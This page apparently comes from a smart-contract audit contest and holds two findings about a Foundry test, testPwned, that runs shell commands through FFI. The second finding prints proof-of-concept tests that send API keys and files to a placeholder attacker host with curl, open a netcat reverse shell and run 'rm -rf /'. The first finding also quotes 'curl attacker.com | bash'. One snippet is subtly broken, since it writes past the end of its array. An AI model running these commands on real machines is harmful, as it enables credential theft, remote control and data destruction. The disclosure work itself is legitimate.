[L-1] testPwned in test suite uses FFI to execute arbitrary shell commands
Root + Impact
Description
-
Foundry's
ffi(Foreign Function Interface) feature allows tests to execute arbitrary shell commands on the host machine. While sometimes used for legitimate purposes (e.g. generating calldata from scripts), enablingffi = trueglobally infoundry.tomland embeddingvm.fficalls in tests creates a supply-chain risk for any developer who clones and runs the test suite. -
The test
testPwnedconstructs and executestouch youve-been-pwned, creating a file in the working directory. This is a demonstration of arbitrary code execution, a more malicious payload (e.g.curl attacker.com | bash) would have the exact same execution path. Runningforge testconfirmed the file was created on disk.
Risk
Likelihood:
The command executes automatically whenever a developer runs
forge testwithffi = trueactive infoundry.tomlno special flag requiredA malicious version could silently exfiltrate credentials, environment variables, or SSH keys
Impact:
Arbitrary files can be created, modified, or deleted on any developer's machine
In a real supply-chain attack, private keys or environment secrets could be exfiltrated
Developer trust in the entire test suite is undermined
Proof of Concept
Cloning the repo and running forge test is sufficient to trigger the shell command. After running, a file named youve-been-pwned appears in the working directory, confirming arbitrary shell execution on the host machine.
Recommended Mitigation
Remove the testPwned test entirely and disable ffi in foundry.toml. If FFI is genuinely needed for a specific test, scope it to a dedicated profile rather than enabling it globally.
Lead Judging Commences
[H-06] Malicious Test potentially allowing data extraction from the user running it
## Description The test suite includes a function named testPwned, which executes arbitrary commands on the user's machine. This presents a significant security risk, as such commands could potentially extract sensitive data, establish a reverse shell for remote control, search for passwords, or install malware. ## Vulnerability Details This is the malicious test, it looks inoffensive as it just create a file called `youve-been-pwned` but there is no underlying reason for this test to be here except a malicious behavior. ```javascript function testPwned() public { string[] memory cmds = new string[](2); cmds[0] = "touch"; cmds[1] = string.concat("youve-been-pwned"); cheatCodes.ffi(cmds); } ``` A more alarming scenario is demonstrated in the following proof of concept, where the user's API key could be compromised:. First export the api key in your shell ```bash export ARBITRUMSCAN_API_KEY='MY_SECRET_KEY' ``` Then execute the test to store the API key in a file: ```javascript function testWriteCommande() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "env | grep ARBITRUMSCAN_API_KEY > PwnedApiKey"; cheatCodes.ffi(cmds); } ``` Alternatively, transmit it to an external server: ```javascript cmds[2] = "curl 'https://<HACKER_IP>?arbitrum_rpc_url='$(env | grep ARBITRUM_RPC_URL | cut -d '=' -f2)"; ``` Other interesting POC that qualify this issue as a HIGH ### POC 1: Reverse Shell Using Netcat This POC demonstrates how a test could open a reverse shell, allowing an attacker to gain control over the user's machine. ```javascript function testReverseShell() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "nc -e /bin/bash <HACKER_IP> <PORT>"; cheatCodes.ffi(cmds); } ``` ### POC 2: Finding Files and Sending Results to a Server This POC shows how a test could find specific files (starting with "pass" ) and send the results to a remote server. ```javascript function testFindCommand() public { string[] memory cmds = new string[](3); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "find / -name 'pass*' | curl -F 'data=@-' https://<HACKER_IP>/upload"; cheatCodes.ffi(cmds); } ``` ### POC 3: Destructive Command (rm -rf /) This POC demonstrates a highly destructive command that could potentially erase all data on the user's root filesystem. # Warning: This command is extremely harmful and should never be executed. ```javascript function testDestructiveCommand() public { string[] memory cmds = new string[](2); cmds[0] = "bash"; cmds[1] = "-c"; cmds[2] = "rm -rf /"; cheatCodes.ffi(cmds); } ``` # Important Disclaimer: The rm -rf / command will delete everything on the filesystem for which the user has write permissions. It is provided here strictly for educational purposes to demonstrate the severity of security vulnerabilities in scripts and should never be run on any system. ## Impact This issue is categorized as HIGH due to the direct risk it poses to funds and sensitive information. The test, as it stands, is harmful, as it is used in a security contexts but i assume that the general purpose of this functionality is to be harmfull. It could lead to data breaches (including private keys and passwords), unauthorized remote code execution, and the potential destruction of digital information (e.g., rm -rf /). ## Recommendations Always exercise caution before running third-party programs on your system. Ensure you understand the functionality of any command or script to prevent unintended consequences, especially those involving security vulnerabilities.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.